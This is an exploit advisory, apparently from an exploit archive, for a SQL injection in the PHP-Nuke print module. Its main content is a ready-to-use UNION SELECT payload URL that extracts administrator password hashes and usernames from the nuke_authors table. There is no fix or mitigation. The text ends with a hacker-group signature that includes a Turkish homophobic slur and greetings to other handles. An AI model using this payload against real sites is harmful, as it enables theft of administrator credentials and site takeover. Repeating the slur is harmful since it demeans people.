id: 12766
date: 06/17/2010
title: PHP-Nuke Module print 6.0 (print&sid) SQL Injection Vulnerability
author: Gamoscu
cves: 

=================================================================
PHP-Nuke Module print 6.0 (print&sid) SQL Injection Vulnerability
=================================================================


PHP-Nuke Module print 6.0 (print&sid) SQL Injection Vulnerability
       
########################### 
Author    : Gamoscu
Homepage  : www.1923turk.com
Blog      : http://gamoscu.wordpress.com
Script    : PHP-Nuke Module print 6.0
Download  : http://phpnuke.org/modules.php?name=Downloads&d_op=viewdownload&cid=6
###########################   
         
[ Vulnerable File ] 
     
modules.php?name=News&file=print&sid= [ SQL ] 
          
     
[ XpL ] 
       
http://www.xxxxx/modules.php?name=News&file=print&sid=-1+union+select+1,2,pwd,aid,5,6,7+from+nuke_authors--
 
 
Deli Kurtlar derki:
     
~~~~Yerinde sayanlar,Y?r?yenlerden cok g?r?lt? yaparlar!~~~~
 
 
Lamer ibneleri!!  sizi suleyman day?ya havale ediyorum :) onlar Kendilerini iyi bilirler
 
Maskeli5ler cok yakinda  Deli KurtlarLA Donuyor
       
Baybora :http://baybora.wordpress.com
 
X-TRO   :http://maskeli5ler.wordpress.com
   
        
##############################################################   
# Greetz: Manas58 - - Delibey - Tiamo - Psiko - Turco - infazci     
##############################################################



#  0day.today [2023-03-26]  #